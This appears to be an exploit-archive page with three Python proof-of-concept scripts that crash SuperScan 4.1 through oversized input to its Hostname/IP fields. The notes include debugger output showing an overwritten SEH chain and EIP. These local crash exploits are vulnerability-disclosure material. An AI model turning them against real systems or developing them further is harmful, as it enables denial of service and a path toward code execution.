Home / exploitsPDF  

SuperScan 4.1 Buffer Overflow

Posted on 20 November 2015

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1.py
# 2.- Open super_scan_4.1.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Scan > Hostname/IP
# 5.- Clic on add button (->)
# 6.- Crashed

buffer = "x41" * 636
eip = "x42" * 4

f = open ("super_scan_4.1.txt", "w")
f.write(buffer + eip)
f.close()

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_tools.py
# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Tools > Hostname/IP/URL
# 5.- Clic on button -> Whois
# 6.- Crashed

buffer = "x41" * 280
eip = "x42" * 4

f = open ("super_scan_4.1_tools.txt", "w")
f.write(buffer + eip)
f.close()

!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
# 5.- Clic on button -> Enumerate
# 6.- Crashed
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 00E3FF98 43434343
# 42424242 *** CORRUPT ENTRY ***

# And the Stack

#00E3FF88 41414141 AAAA
#00E3FF8C 41414141 AAAA
#00E3FF90 41414141 AAAA
#00E3FF94 41414141 AAAA
#00E3FF98 42424242 BBBB Pointer to next SEH record
#00E3FF9C 43434343 CCCC SE handler

# And the Registers

#EAX 00000001
#ECX 00000001
#EDX 7C91E514 ntdll.KiFastSystemCallRet
#EBX 00A028E8
#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
#EBP 41414141
#ESI 00473774 SuperSca.00473774
#EDI 00000000
#EIP 41414141

buffer = "x41" * 328
nseh = "x42" * 4
seh = "x43" * 4

f = open ("super_scan_4.1_windows_enumeration.txt", "w")
f.write(buffer + nseh + seh)
f.close()

 

TOP

Malware :

Exploits :